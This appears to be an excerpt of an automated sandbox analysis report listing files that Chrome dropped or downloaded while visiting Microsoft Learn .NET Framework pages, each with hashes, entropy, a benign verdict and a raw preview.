                                                                                                                                                                                          SHA-512:541258770FE0A31D7979B1C4F131B84841EFF70C24D2D4CD7ED6E67E14A64B7516CC825E6D82B23E2449E68291EC60FF99EED243EB43A56992A26EE851717600
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,.........=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X..j.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sat Nov 23 15:44:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2683
                                                                                                                                                                                          Entropy (8bit):3.9969152610189167
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:87vd1Tdl6H1idAKZdA1duT+ehOuTbbiZUk5OjqehOuTb9y+yT+:8P/NT/TbxWOvTb9y7T
                                                                                                                                                                                          MD5:1FE000229E8832BEDAC59B74F4D542D0
                                                                                                                                                                                          SHA1:D31D5B6FD3F387A23765A43979DF3175043397FB
                                                                                                                                                                                          SHA-256:3F33BCA7A5C93A1C61A9543DC36017B9879F5546627DD4222FED87DC8D8F502A
                                                                                                                                                                                          SHA-512:3888359BF88421B9806BB53E709A1E17BE0A25FD48589D02FA16BDC95AD08A1FC32A1E311CCE80001BA90299CEB33EF668C1B9C9EFA54747DE39EE046839F4E6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview:L..................F.@.. ...$+.,......j..=..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IwY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VwY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VwY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VwY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VwY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........X..j.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                          URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):1817143
                                                                                                                                                                                          Entropy (8bit):5.501007973622959
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                          MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                          SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):17174
                                                                                                                                                                                          Entropy (8bit):2.9129715116732746
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                          MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                          SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                          SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                          SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):13842
                                                                                                                                                                                          Entropy (8bit):7.802399161550213
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                          MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                          SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                          SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                          SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                          Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):33148
                                                                                                                                                                                          Entropy (8bit):4.917595394577667
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                          MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                          SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                          SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                          SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):5644
                                                                                                                                                                                          Entropy (8bit):4.785769732002188
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                          MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                          SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                          SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                          SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                          Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):35005
                                                                                                                                                                                          Entropy (8bit):7.980061050467981
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                          MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                          SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                          SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                          SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                          Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):4897
                                                                                                                                                                                          Entropy (8bit):4.8007377074457604
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                          MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                          SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                          SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                          SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                          Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1173007
                                                                                                                                                                                          Entropy (8bit):5.503893944397598
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                          MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                          SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                          SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                          SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1817143
                                                                                                                                                                                          Entropy (8bit):5.501007973622959
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                          MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                          SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                          SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                          SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1432
                                                                                                                                                                                          Entropy (8bit):4.986131881931089
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                          MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                          SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                          SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                          SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                          Size (bytes):1154
